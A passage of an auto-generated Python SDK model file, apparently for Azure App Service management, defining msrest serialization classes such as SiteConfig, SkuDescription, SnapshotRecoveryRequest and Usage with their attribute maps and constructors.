self.enabled_host_names = None
self.availability_state = None
self.host_name_ssl_states = kwargs.get('host_name_ssl_states', None)
self.server_farm_id = kwargs.get('server_farm_id', None)
self.reserved = kwargs.get('reserved', False)
self.last_modified_time_utc = None
self.site_config = kwargs.get('site_config', None)
self.traffic_manager_host_names = None
self.scm_site_also_stopped = kwargs.get('scm_site_also_stopped', False)
self.target_swap_slot = None
self.hosting_environment_profile = kwargs.get('hosting_environment_profile', None)
self.client_affinity_enabled = kwargs.get('client_affinity_enabled', None)
self.client_cert_enabled = kwargs.get('client_cert_enabled', None)
self.host_names_disabled = kwargs.get('host_names_disabled', None)
self.outbound_ip_addresses = None
self.possible_outbound_ip_addresses = None
self.container_size = kwargs.get('container_size', None)
self.daily_memory_time_quota = kwargs.get('daily_memory_time_quota', None)
self.suspended_till = None
self.max_number_of_workers = None
self.cloning_info = kwargs.get('cloning_info', None)
self.snapshot_info = kwargs.get('snapshot_info', None)
self.resource_group = None
self.is_default_container = None
self.default_host_name = None
self.slot_swap_status = None
self.https_only = kwargs.get('https_only', None)
class SiteConfig(msrest.serialization.Model):
"""Configuration of an App Service app.
Variables are only populated by the server, and will be ignored when sending a request.
:param number_of_workers: Number of workers.
:type number_of_workers: int
:param default_documents: Default documents.
:type default_documents: list[str]
:param net_framework_version: .NET Framework version.
:type net_framework_version: str
:param php_version: Version of PHP.
:type php_version: str
:param python_version: Version of Python.
:type python_version: str
:param node_version: Version of Node.js.
:type node_version: str
:param linux_fx_version: Linux App Framework and version.
:type linux_fx_version: str
:param request_tracing_enabled: :code:`<code>true</code>` if request tracing is enabled;
otherwise, :code:`<code>false</code>`.
:type request_tracing_enabled: bool
:param request_tracing_expiration_time: Request tracing expiration time.
:type request_tracing_expiration_time: ~datetime.datetime
:param remote_debugging_enabled: :code:`<code>true</code>` if remote debugging is enabled;
otherwise, :code:`<code>false</code>`.
:type remote_debugging_enabled: bool
:param remote_debugging_version: Remote debugging version.
:type remote_debugging_version: str
:param http_logging_enabled: :code:`<code>true</code>` if HTTP logging is enabled; otherwise,
:code:`<code>false</code>`.
:type http_logging_enabled: bool
:param logs_directory_size_limit: HTTP logs directory size limit.
:type logs_directory_size_limit: int
:param detailed_error_logging_enabled: :code:`<code>true</code>` if detailed error logging is
enabled; otherwise, :code:`<code>false</code>`.
:type detailed_error_logging_enabled: bool
:param publishing_username: Publishing user name.
:type publishing_username: str
:param app_settings: Application settings.
:type app_settings: list[~azure.mgmt.web.v2016_09_01.models.NameValuePair]
:param connection_strings: Connection strings.
:type connection_strings: list[~azure.mgmt.web.v2016_09_01.models.ConnStringInfo]
:ivar machine_key: Site MachineKey.
:vartype machine_key: ~azure.mgmt.web.v2016_09_01.models.SiteMachineKey
:param handler_mappings: Handler mappings.
:type handler_mappings: list[~azure.mgmt.web.v2016_09_01.models.HandlerMapping]
:param document_root: Document root.
:type document_root: str
:param scm_type: SCM type. Possible values include: "None", "Dropbox", "Tfs", "LocalGit",
"GitHub", "CodePlexGit", "CodePlexHg", "BitbucketGit", "BitbucketHg", "ExternalGit",
"ExternalHg", "OneDrive", "VSO".
:type scm_type: str or ~azure.mgmt.web.v2016_09_01.models.ScmType
:param use32_bit_worker_process: :code:`<code>true</code>` to use 32-bit worker process;
otherwise, :code:`<code>false</code>`.
:type use32_bit_worker_process: bool
:param web_sockets_enabled: :code:`<code>true</code>` if WebSocket is enabled; otherwise,
:code:`<code>false</code>`.
:type web_sockets_enabled: bool
:param always_on: :code:`<code>true</code>` if Always On is enabled; otherwise,
:code:`<code>false</code>`.
:type always_on: bool
:param java_version: Java version.
:type java_version: str
:param java_container: Java container.
:type java_container: str
:param java_container_version: Java container version.
:type java_container_version: str
:param app_command_line: App command line to launch.
:type app_command_line: str
:param managed_pipeline_mode: Managed pipeline mode. Possible values include: "Integrated",
"Classic".
:type managed_pipeline_mode: str or ~azure.mgmt.web.v2016_09_01.models.ManagedPipelineMode
:param virtual_applications: Virtual applications.
:type virtual_applications: list[~azure.mgmt.web.v2016_09_01.models.VirtualApplication]
:param load_balancing: Site load balancing. Possible values include: "WeightedRoundRobin",
"LeastRequests", "LeastResponseTime", "WeightedTotalTraffic", "RequestHash".
:type load_balancing: str or ~azure.mgmt.web.v2016_09_01.models.SiteLoadBalancing
:param experiments: This is work around for polymorphic types.
:type experiments: ~azure.mgmt.web.v2016_09_01.models.Experiments
:param limits: Site limits.
:type limits: ~azure.mgmt.web.v2016_09_01.models.SiteLimits
:param auto_heal_enabled: :code:`<code>true</code>` if Auto Heal is enabled; otherwise,
:code:`<code>false</code>`.
:type auto_heal_enabled: bool
:param auto_heal_rules: Auto Heal rules.
:type auto_heal_rules: ~azure.mgmt.web.v2016_09_01.models.AutoHealRules
:param tracing_options: Tracing options.
:type tracing_options: str
:param vnet_name: Virtual Network name.
:type vnet_name: str
:param cors: Cross-Origin Resource Sharing (CORS) settings.
:type cors: ~azure.mgmt.web.v2016_09_01.models.CorsSettings
:param push: Push endpoint settings.
:type push: ~azure.mgmt.web.v2016_09_01.models.PushSettings
:param api_definition: Information about the formal API definition for the app.
:type api_definition: ~azure.mgmt.web.v2016_09_01.models.ApiDefinitionInfo
:param auto_swap_slot_name: Auto-swap slot name.
:type auto_swap_slot_name: str
:param local_my_sql_enabled: :code:`<code>true</code>` to enable local MySQL; otherwise,
:code:`<code>false</code>`.
:type local_my_sql_enabled: bool
:param ip_security_restrictions: IP security restrictions.
:type ip_security_restrictions: list[~azure.mgmt.web.v2016_09_01.models.IpSecurityRestriction]
:param http20_enabled: Http20Enabled: configures a web site to allow clients to connect over
http2.0.
:type http20_enabled: bool
:param min_tls_version: MinTlsVersion: configures the minimum version of TLS required for SSL
requests. Possible values include: "1.0", "1.1", "1.2".
:type min_tls_version: str or ~azure.mgmt.web.v2016_09_01.models.SupportedTlsVersions
"""
_validation = {
'machine_key': {'readonly': True},
}
_attribute_map = {
'number_of_workers': {'key': 'numberOfWorkers', 'type': 'int'},
'default_documents': {'key': 'defaultDocuments', 'type': '[str]'},
'net_framework_version': {'key': 'netFrameworkVersion', 'type': 'str'},
'php_version': {'key': 'phpVersion', 'type': 'str'},
'python_version': {'key': 'pythonVersion', 'type': 'str'},
'node_version': {'key': 'nodeVersion', 'type': 'str'},
'linux_fx_version': {'key': 'linuxFxVersion', 'type': 'str'},
'request_tracing_enabled': {'key': 'requestTracingEnabled', 'type': 'bool'},
'request_tracing_expiration_time': {'key': 'requestTracingExpirationTime', 'type': 'iso-8601'},
'remote_debugging_enabled': {'key': 'remoteDebuggingEnabled', 'type': 'bool'},
'remote_debugging_version': {'key': 'remoteDebuggingVersion', 'type': 'str'},
'http_logging_enabled': {'key': 'httpLoggingEnabled', 'type': 'bool'},
'logs_directory_size_limit': {'key': 'logsDirectorySizeLimit', 'type': 'int'},
'detailed_error_logging_enabled': {'key': 'detailedErrorLoggingEnabled', 'type': 'bool'},
'publishing_username': {'key': 'publishingUsername', 'type': 'str'},
'app_settings': {'key': 'appSettings', 'type': '[NameValuePair]'},
'connection_strings': {'key': 'connectionStrings', 'type': '[ConnStringInfo]'},
'machine_key': {'key': 'machineKey', 'type': 'SiteMachineKey'},
'handler_mappings': {'key': 'handlerMappings', 'type': '[HandlerMapping]'},
'document_root': {'key': 'documentRoot', 'type': 'str'},
'scm_type': {'key': 'scmType', 'type': 'str'},
'use32_bit_worker_process': {'key': 'use32BitWorkerProcess', 'type': 'bool'},
'web_sockets_enabled': {'key': 'webSocketsEnabled', 'type': 'bool'},
'always_on': {'key': 'alwaysOn', 'type': 'bool'},
'java_version': {'key': 'javaVersion', 'type': 'str'},
'java_container': {'key': 'javaContainer', 'type': 'str'},
'java_container_version': {'key': 'javaContainerVersion', 'type': 'str'},
'app_command_line': {'key': 'appCommandLine', 'type': 'str'},
'managed_pipeline_mode': {'key': 'managedPipelineMode', 'type': 'str'},
'virtual_applications': {'key': 'virtualApplications', 'type': '[VirtualApplication]'},
'load_balancing': {'key': 'loadBalancing', 'type': 'str'},
'experiments': {'key': 'experiments', 'type': 'Experiments'},
'limits': {'key': 'limits', 'type': 'SiteLimits'},
'auto_heal_enabled': {'key': 'autoHealEnabled', 'type': 'bool'},
'auto_heal_rules': {'key': 'autoHealRules', 'type': 'AutoHealRules'},
'tracing_options': {'key': 'tracingOptions', 'type': 'str'},
'vnet_name': {'key': 'vnetName', 'type': 'str'},
'cors': {'key': 'cors', 'type': 'CorsSettings'},
'push': {'key': 'push', 'type': 'PushSettings'},
'api_definition': {'key': 'apiDefinition', 'type': 'ApiDefinitionInfo'},
'auto_swap_slot_name': {'key': 'autoSwapSlotName', 'type': 'str'},
'local_my_sql_enabled': {'key': 'localMySqlEnabled', 'type': 'bool'},
'ip_security_restrictions': {'key': 'ipSecurityRestrictions', 'type': '[IpSecurityRestriction]'},
'http20_enabled': {'key': 'http20Enabled', 'type': 'bool'},
'min_tls_version': {'key': 'minTlsVersion', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SiteConfig, self).__init__(**kwargs)
self.number_of_workers = kwargs.get('number_of_workers', None)
self.default_documents = kwargs.get('default_documents', None)
self.net_framework_version = kwargs.get('net_framework_version', "v4.6")
self.php_version = kwargs.get('php_version', None)
self.python_version = kwargs.get('python_version', None)
self.node_version = kwargs.get('node_version', None)
self.linux_fx_version = kwargs.get('linux_fx_version', None)
self.request_tracing_enabled = kwargs.get('request_tracing_enabled', None)
self.request_tracing_expiration_time = kwargs.get('request_tracing_expiration_time', None)
self.remote_debugging_enabled = kwargs.get('remote_debugging_enabled', None)
self.remote_debugging_version = kwargs.get('remote_debugging_version', None)
self.http_logging_enabled = kwargs.get('http_logging_enabled', None)
self.logs_directory_size_limit = kwargs.get('logs_directory_size_limit', None)
self.detailed_error_logging_enabled = kwargs.get('detailed_error_logging_enabled', None)
self.publishing_username = kwargs.get('publishing_username', None)
self.app_settings = kwargs.get('app_settings', None)
self.connection_strings = kwargs.get('connection_strings', None)
self.machine_key = None
self.handler_mappings = kwargs.get('handler_mappings', None)
self.document_root = kwargs.get('document_root', None)
self.scm_type = kwargs.get('scm_type', None)
self.use32_bit_worker_process = kwargs.get('use32_bit_worker_process', None)
self.web_sockets_enabled = kwargs.get('web_sockets_enabled', None)
self.always_on = kwargs.get('always_on', None)
self.java_version = kwargs.get('java_version', None)
self.java_container = kwargs.get('java_container', None)
self.java_container_version = kwargs.get('java_container_version', None)
self.app_command_line = kwargs.get('app_command_line', None)
self.managed_pipeline_mode = kwargs.get('managed_pipeline_mode', None)
self.virtual_applications = kwargs.get('virtual_applications', None)
self.load_balancing = kwargs.get('load_balancing', None)
self.experiments = kwargs.get('experiments', None)
self.limits = kwargs.get('limits', None)
self.auto_heal_enabled = kwargs.get('auto_heal_enabled', None)
self.auto_heal_rules = kwargs.get('auto_heal_rules', None)
self.tracing_options = kwargs.get('tracing_options', None)
self.vnet_name = kwargs.get('vnet_name', None)
self.cors = kwargs.get('cors', None)
self.push = kwargs.get('push', None)
self.api_definition = kwargs.get('api_definition', None)
self.auto_swap_slot_name = kwargs.get('auto_swap_slot_name', None)
self.local_my_sql_enabled = kwargs.get('local_my_sql_enabled', False)
self.ip_security_restrictions = kwargs.get('ip_security_restrictions', None)
self.http20_enabled = kwargs.get('http20_enabled', True)
self.min_tls_version = kwargs.get('min_tls_version', None)
class SiteLimits(msrest.serialization.Model):
"""Metric limits set on an app.
:param max_percentage_cpu: Maximum allowed CPU usage percentage.
:type max_percentage_cpu: float
:param max_memory_in_mb: Maximum allowed memory usage in MB.
:type max_memory_in_mb: long
:param max_disk_size_in_mb: Maximum allowed disk size usage in MB.
:type max_disk_size_in_mb: long
"""
_attribute_map = {
'max_percentage_cpu': {'key': 'maxPercentageCpu', 'type': 'float'},
'max_memory_in_mb': {'key': 'maxMemoryInMb', 'type': 'long'},
'max_disk_size_in_mb': {'key': 'maxDiskSizeInMb', 'type': 'long'},
}
def __init__(
self,
**kwargs
):
super(SiteLimits, self).__init__(**kwargs)
self.max_percentage_cpu = kwargs.get('max_percentage_cpu', None)
self.max_memory_in_mb = kwargs.get('max_memory_in_mb', None)
self.max_disk_size_in_mb = kwargs.get('max_disk_size_in_mb', None)
class SiteMachineKey(msrest.serialization.Model):
"""MachineKey of an app.
:param validation: MachineKey validation.
:type validation: str
:param validation_key: Validation key.
:type validation_key: str
:param decryption: Algorithm used for decryption.
:type decryption: str
:param decryption_key: Decryption key.
:type decryption_key: str
"""
_attribute_map = {
'validation': {'key': 'validation', 'type': 'str'},
'validation_key': {'key': 'validationKey', 'type': 'str'},
'decryption': {'key': 'decryption', 'type': 'str'},
'decryption_key': {'key': 'decryptionKey', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SiteMachineKey, self).__init__(**kwargs)
self.validation = kwargs.get('validation', None)
self.validation_key = kwargs.get('validation_key', None)
self.decryption = kwargs.get('decryption', None)
self.decryption_key = kwargs.get('decryption_key', None)
class SkuCapacity(msrest.serialization.Model):
"""Description of the App Service plan scale options.
:param minimum: Minimum number of workers for this App Service plan SKU.
:type minimum: int
:param maximum: Maximum number of workers for this App Service plan SKU.
:type maximum: int
:param default: Default number of workers for this App Service plan SKU.
:type default: int
:param scale_type: Available scale configurations for an App Service plan.
:type scale_type: str
"""
_attribute_map = {
'minimum': {'key': 'minimum', 'type': 'int'},
'maximum': {'key': 'maximum', 'type': 'int'},
'default': {'key': 'default', 'type': 'int'},
'scale_type': {'key': 'scaleType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SkuCapacity, self).__init__(**kwargs)
self.minimum = kwargs.get('minimum', None)
self.maximum = kwargs.get('maximum', None)
self.default = kwargs.get('default', None)
self.scale_type = kwargs.get('scale_type', None)
class SkuDescription(msrest.serialization.Model):
"""Description of a SKU for a scalable resource.
:param name: Name of the resource SKU.
:type name: str
:param tier: Service tier of the resource SKU.
:type tier: str
:param size: Size specifier of the resource SKU.
:type size: str
:param family: Family code of the resource SKU.
:type family: str
:param capacity: Current number of instances assigned to the resource.
:type capacity: int
:param sku_capacity: Min, max, and default scale values of the SKU.
:type sku_capacity: ~azure.mgmt.web.v2016_09_01.models.SkuCapacity
:param locations: Locations of the SKU.
:type locations: list[str]
:param capabilities: Capabilities of the SKU, e.g., is traffic manager enabled?.
:type capabilities: list[~azure.mgmt.web.v2016_09_01.models.Capability]
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
'size': {'key': 'size', 'type': 'str'},
'family': {'key': 'family', 'type': 'str'},
'capacity': {'key': 'capacity', 'type': 'int'},
'sku_capacity': {'key': 'skuCapacity', 'type': 'SkuCapacity'},
'locations': {'key': 'locations', 'type': '[str]'},
'capabilities': {'key': 'capabilities', 'type': '[Capability]'},
}
def __init__(
self,
**kwargs
):
super(SkuDescription, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.tier = kwargs.get('tier', None)
self.size = kwargs.get('size', None)
self.family = kwargs.get('family', None)
self.capacity = kwargs.get('capacity', None)
self.sku_capacity = kwargs.get('sku_capacity', None)
self.locations = kwargs.get('locations', None)
self.capabilities = kwargs.get('capabilities', None)
class SkuInfo(msrest.serialization.Model):
"""SKU discovery information.
:param resource_type: Resource type that this SKU applies to.
:type resource_type: str
:param sku: Name and tier of the SKU.
:type sku: ~azure.mgmt.web.v2016_09_01.models.SkuDescription
:param capacity: Min, max, and default scale values of the SKU.
:type capacity: ~azure.mgmt.web.v2016_09_01.models.SkuCapacity
"""
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'SkuDescription'},
'capacity': {'key': 'capacity', 'type': 'SkuCapacity'},
}
def __init__(
self,
**kwargs
):
super(SkuInfo, self).__init__(**kwargs)
self.resource_type = kwargs.get('resource_type', None)
self.sku = kwargs.get('sku', None)
self.capacity = kwargs.get('capacity', None)
class SkuInfoCollection(msrest.serialization.Model):
"""Collection of SKU information.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.SkuInfo]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[SkuInfo]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SkuInfoCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class SlotSwapStatus(msrest.serialization.Model):
"""The status of the last successful slot swap operation.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar timestamp_utc: The time the last successful slot swap completed.
:vartype timestamp_utc: ~datetime.datetime
:ivar source_slot_name: The source slot of the last swap operation.
:vartype source_slot_name: str
:ivar destination_slot_name: The destination slot of the last swap operation.
:vartype destination_slot_name: str
"""
_validation = {
'timestamp_utc': {'readonly': True},
'source_slot_name': {'readonly': True},
'destination_slot_name': {'readonly': True},
}
_attribute_map = {
'timestamp_utc': {'key': 'timestampUtc', 'type': 'iso-8601'},
'source_slot_name': {'key': 'sourceSlotName', 'type': 'str'},
'destination_slot_name': {'key': 'destinationSlotName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SlotSwapStatus, self).__init__(**kwargs)
self.timestamp_utc = None
self.source_slot_name = None
self.destination_slot_name = None
class SlowRequestsBasedTrigger(msrest.serialization.Model):
"""Trigger based on request execution time.
:param time_taken: Time taken.
:type time_taken: str
:param count: Request Count.
:type count: int
:param time_interval: Time interval.
:type time_interval: str
"""
_attribute_map = {
'time_taken': {'key': 'timeTaken', 'type': 'str'},
'count': {'key': 'count', 'type': 'int'},
'time_interval': {'key': 'timeInterval', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SlowRequestsBasedTrigger, self).__init__(**kwargs)
self.time_taken = kwargs.get('time_taken', None)
self.count = kwargs.get('count', None)
self.time_interval = kwargs.get('time_interval', None)
class SnapshotRecoveryRequest(ProxyOnlyResource):
"""Details about app recovery operation.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param snapshot_time: Point in time in which the app recovery should be attempted, formatted as
a DateTime string.
:type snapshot_time: str
:param recovery_target: Specifies the web app that snapshot contents will be written to.
:type recovery_target: ~azure.mgmt.web.v2016_09_01.models.SnapshotRecoveryTarget
:param overwrite: If :code:`<code>true</code>` the recovery operation can overwrite source app;
otherwise, :code:`<code>false</code>`.
:type overwrite: bool
:param recover_configuration: If true, site configuration, in addition to content, will be
reverted.
:type recover_configuration: bool
:param ignore_conflicting_host_names: If true, custom hostname conflicts will be ignored when
recovering to a target web app.
This setting is only necessary when RecoverConfiguration is enabled.
:type ignore_conflicting_host_names: bool
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'snapshot_time': {'key': 'properties.snapshotTime', 'type': 'str'},
'recovery_target': {'key': 'properties.recoveryTarget', 'type': 'SnapshotRecoveryTarget'},
'overwrite': {'key': 'properties.overwrite', 'type': 'bool'},
'recover_configuration': {'key': 'properties.recoverConfiguration', 'type': 'bool'},
'ignore_conflicting_host_names': {'key': 'properties.ignoreConflictingHostNames', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(SnapshotRecoveryRequest, self).__init__(**kwargs)
self.snapshot_time = kwargs.get('snapshot_time', None)
self.recovery_target = kwargs.get('recovery_target', None)
self.overwrite = kwargs.get('overwrite', None)
self.recover_configuration = kwargs.get('recover_configuration', None)
self.ignore_conflicting_host_names = kwargs.get('ignore_conflicting_host_names', None)
class SnapshotRecoveryTarget(msrest.serialization.Model):
"""Specifies the web app that snapshot contents will be written to.
:param location: Geographical location of the target web app, e.g. SouthEastAsia,
SouthCentralUS.
:type location: str
:param id: ARM resource ID of the target app.
/subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{siteName}
for production slots and
/subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{siteName}/slots/{slotName}
for other slots.
:type id: str
"""
_attribute_map = {
'location': {'key': 'location', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SnapshotRecoveryTarget, self).__init__(**kwargs)
self.location = kwargs.get('location', None)
self.id = kwargs.get('id', None)
class StampCapacity(msrest.serialization.Model):
"""Stamp capacity information.
:param name: Name of the stamp.
:type name: str
:param available_capacity: Available capacity (# of machines, bytes of storage etc...).
:type available_capacity: long
:param total_capacity: Total capacity (# of machines, bytes of storage etc...).
:type total_capacity: long
:param unit: Name of the unit.
:type unit: str
:param compute_mode: Shared/dedicated workers. Possible values include: "Shared", "Dedicated",
"Dynamic".
:type compute_mode: str or ~azure.mgmt.web.v2016_09_01.models.ComputeModeOptions
:param worker_size: Size of the machines. Possible values include: "Default", "Small",
"Medium", "Large", "D1", "D2", "D3".
:type worker_size: str or ~azure.mgmt.web.v2016_09_01.models.WorkerSizeOptions
:param worker_size_id: Size ID of machines:
0 - Small
1 - Medium
2 - Large.
:type worker_size_id: int
:param exclude_from_capacity_allocation: If :code:`<code>true</code>`, it includes basic apps.
Basic apps are not used for capacity allocation.
:type exclude_from_capacity_allocation: bool
:param is_applicable_for_all_compute_modes: :code:`<code>true</code>` if capacity is applicable
for all apps; otherwise, :code:`<code>false</code>`.
:type is_applicable_for_all_compute_modes: bool
:param site_mode: Shared or Dedicated.
:type site_mode: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'available_capacity': {'key': 'availableCapacity', 'type': 'long'},
'total_capacity': {'key': 'totalCapacity', 'type': 'long'},
'unit': {'key': 'unit', 'type': 'str'},
'compute_mode': {'key': 'computeMode', 'type': 'str'},
'worker_size': {'key': 'workerSize', 'type': 'str'},
'worker_size_id': {'key': 'workerSizeId', 'type': 'int'},
'exclude_from_capacity_allocation': {'key': 'excludeFromCapacityAllocation', 'type': 'bool'},
'is_applicable_for_all_compute_modes': {'key': 'isApplicableForAllComputeModes', 'type': 'bool'},
'site_mode': {'key': 'siteMode', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StampCapacity, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.available_capacity = kwargs.get('available_capacity', None)
self.total_capacity = kwargs.get('total_capacity', None)
self.unit = kwargs.get('unit', None)
self.compute_mode = kwargs.get('compute_mode', None)
self.worker_size = kwargs.get('worker_size', None)
self.worker_size_id = kwargs.get('worker_size_id', None)
self.exclude_from_capacity_allocation = kwargs.get('exclude_from_capacity_allocation', None)
self.is_applicable_for_all_compute_modes = kwargs.get('is_applicable_for_all_compute_modes', None)
self.site_mode = kwargs.get('site_mode', None)
class StampCapacityCollection(msrest.serialization.Model):
"""Collection of stamp capacities.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.StampCapacity]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[StampCapacity]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StampCapacityCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class StatusCodesBasedTrigger(msrest.serialization.Model):
"""Trigger based on status code.
:param status: HTTP status code.
:type status: int
:param sub_status: Request Sub Status.
:type sub_status: int
:param win32_status: Win32 error code.
:type win32_status: int
:param count: Request Count.
:type count: int
:param time_interval: Time interval.
:type time_interval: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'int'},
'sub_status': {'key': 'subStatus', 'type': 'int'},
'win32_status': {'key': 'win32Status', 'type': 'int'},
'count': {'key': 'count', 'type': 'int'},
'time_interval': {'key': 'timeInterval', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StatusCodesBasedTrigger, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.sub_status = kwargs.get('sub_status', None)
self.win32_status = kwargs.get('win32_status', None)
self.count = kwargs.get('count', None)
self.time_interval = kwargs.get('time_interval', None)
class Usage(ProxyOnlyResource):
"""Usage of the quota resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:ivar display_name: Friendly name shown in the UI.
:vartype display_name: str
:ivar name_properties_name: Name of the quota.
:vartype name_properties_name: str
:ivar resource_name: Name of the quota resource.
:vartype resource_name: str
:ivar unit: Units of measurement for the quota resource.
:vartype unit: str
:ivar current_value: The current value of the resource counter.
:vartype current_value: long
:ivar limit: The resource limit.
:vartype limit: long
:ivar next_reset_time: Next reset time for the resource counter.
:vartype next_reset_time: ~datetime.datetime
:ivar compute_mode: Compute mode used for this usage. Possible values include: "Shared",
"Dedicated", "Dynamic".
:vartype compute_mode: str or ~azure.mgmt.web.v2016_09_01.models.ComputeModeOptions
:ivar site_mode: Site mode used for this usage.
:vartype site_mode: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'display_name': {'readonly': True},
'name_properties_name': {'readonly': True},
'resource_name': {'readonly': True},
'unit': {'readonly': True},
'current_value': {'readonly': True},
'limit': {'readonly': True},
'next_reset_time': {'readonly': True},
'compute_mode': {'readonly': True},
'site_mode': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'display_name': {'key': 'properties.displayName', 'type': 'str'},
'name_properties_name': {'key': 'properties.name', 'type': 'str'},
'resource_name': {'key': 'properties.resourceName', 'type': 'str'},
'unit': {'key': 'properties.unit', 'type': 'str'},
'current_value': {'key': 'properties.currentValue', 'type': 'long'},
'limit': {'key': 'properties.limit', 'type': 'long'},
'next_reset_time': {'key': 'properties.nextResetTime', 'type': 'iso-8601'},
'compute_mode': {'key': 'properties.computeMode', 'type': 'str'},
'site_mode': {'key': 'properties.siteMode', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Usage, self).__init__(**kwargs)
self.display_name = None
self.name_properties_name = None
self.resource_name = None
self.unit = None
self.current_value = None
self.limit = None
self.next_reset_time = None
self.compute_mode = None
self.site_mode = None
class UsageCollection(msrest.serialization.Model):
"""Collection of usages.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.Usage]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[Usage]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UsageCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class VirtualApplication(msrest.serialization.Model):
"""Virtual application in an app.
:param virtual_path: Virtual path.
:type virtual_path: str
:param physical_path: Physical path.
:type physical_path: str
:param preload_enabled: :code:`<code>true</code>` if preloading is enabled; otherwise,
:code:`<code>false</code>`.
:type preload_enabled: bool
:param virtual_directories: Virtual directories for virtual application.
:type virtual_directories: list[~azure.mgmt.web.v2016_09_01.models.VirtualDirectory]
"""
_attribute_map = {
'virtual_path': {'key': 'virtualPath', 'type': 'str'},
'physical_path': {'key': 'physicalPath', 'type': 'str'},
'preload_enabled': {'key': 'preloadEnabled', 'type': 'bool'},
'virtual_directories': {'key': 'virtualDirectories', 'type': '[VirtualDirectory]'},
}
def __init__(
self,
**kwargs
):
super(VirtualApplication, self).__init__(**kwargs)
self.virtual_path = kwargs.get('virtual_path', None)
self.physical_path = kwargs.get('physical_path', None)
self.preload_enabled = kwargs.get('preload_enabled', None)
self.virtual_directories = kwargs.get('virtual_directories', None)
class VirtualDirectory(msrest.serialization.Model):
"""Directory for virtual application.
:param virtual_path: Path to virtual application.
:type virtual_path: str
:param physical_path: Physical path.
:type physical_path: str
"""
_attribute_map = {
'virtual_path': {'key': 'virtualPath', 'type': 'str'},
'physical_path': {'key': 'physicalPath', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VirtualDirectory, self).__init__(**kwargs)
self.virtual_path = kwargs.get('virtual_path', None)
self.physical_path = kwargs.get('physical_path', None)
class VirtualIPMapping(msrest.serialization.Model):
"""Virtual IP mapping.
:param virtual_ip: Virtual IP address.
:type virtual_ip: str
:param internal_http_port: Internal HTTP port.
:type internal_http_port: int
:param internal_https_port: Internal HTTPS port.
:type internal_https_port: int
:param in_use: Is virtual IP mapping in use.
:type in_use: bool
"""
_attribute_map = {
'virtual_ip': {'key': 'virtualIP', 'type': 'str'},
'internal_http_port': {'key': 'internalHttpPort', 'type': 'int'},
'internal_https_port': {'key': 'internalHttpsPort', 'type': 'int'},
'in_use': {'key': 'inUse', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(VirtualIPMapping, self).__init__(**kwargs)
self.virtual_ip = kwargs.get('virtual_ip', None)
self.internal_http_port = kwargs.get('internal_http_port', None)
self.internal_https_port = kwargs.get('internal_https_port', None)
self.in_use = kwargs.get('in_use', None)
class VirtualNetworkProfile(msrest.serialization.Model):
"""Specification for using a Virtual Network.
